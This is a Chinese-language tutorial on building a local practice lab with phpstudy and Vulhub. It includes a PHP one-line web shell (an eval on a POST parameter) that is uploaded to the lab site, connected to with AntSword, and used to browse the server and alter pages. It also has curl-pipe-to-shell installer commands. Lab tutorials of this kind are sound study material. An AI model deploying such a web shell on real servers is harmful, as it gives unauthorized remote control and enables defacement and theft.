1.常见搭建平台脚本使用:
例如 phpstudy IIS Nginx(俗称中间件):
什么是中间件:
中间件是介于应用系统和系统软件之间的一类软件,它使用系统软件所提供的基础服务(功能),衔接网络上应用系统的各个部分或不同的应用,能够达到资源共享、功能共享的目的
1.1首先安装 phpstudy :之前写过---->8861.2安装配置完成之后 启动服务
1.3服务启动完成之后 将我们准备好的网页源代码 复制到 /phpstudy/www目录下
1.4上传php一句话木马看看:
<?php eval($_POST['2004']); ?> //2004为shell密码
1.5上传完成之后 通过蚂蚁剑来里来连接看看:
连接成功:
此时就可以看到服务器磁盘内容以及网站源代码
1.6试图修改网站内容 啊哈哈哈哈:
看一下效果:
2.通过网站抓包来确定网站中间件:
发现是apache服务 win 32位系统 PHP版本为 5.4.45
3.使用Vulhub一键搭建漏洞测试靶场
3.1环境配置:
必要环境:
curl -s https://bootstrap.pypa.io/get-pip.py | python3
pip install docker-compose
docker安装:传送
# 安装pip
curl -s https://bootstrap.pypa.io/get-pip.py | python3
# 安装最新版docker
curl -s https://get.docker.com/ | sh
# 启动docker服务
systemctl start docker
3.2 git靶场 并启动:
# 下载项目
wget https://github.com/vulhub/vulhub/archive/master.zip -O vulhub-master.zip
unzip vulhub-master.zip
cd vulhub-master
# 进入某一个漏洞/环境的目录
cd flask/ssti
# 自动化编译环境
docker compose build
# 启动整个环境
docker compose up -d
3.3进入一个漏洞目录 并进行编译
3.4启动服务:
3.5访问:http:"your-ip":8080
ok 搭建成功!!!
3.6接着对应官方文档进行漏洞复现学习:
网站地址----->886
3.7测试完成后,删除整个环境:
docker compose down -v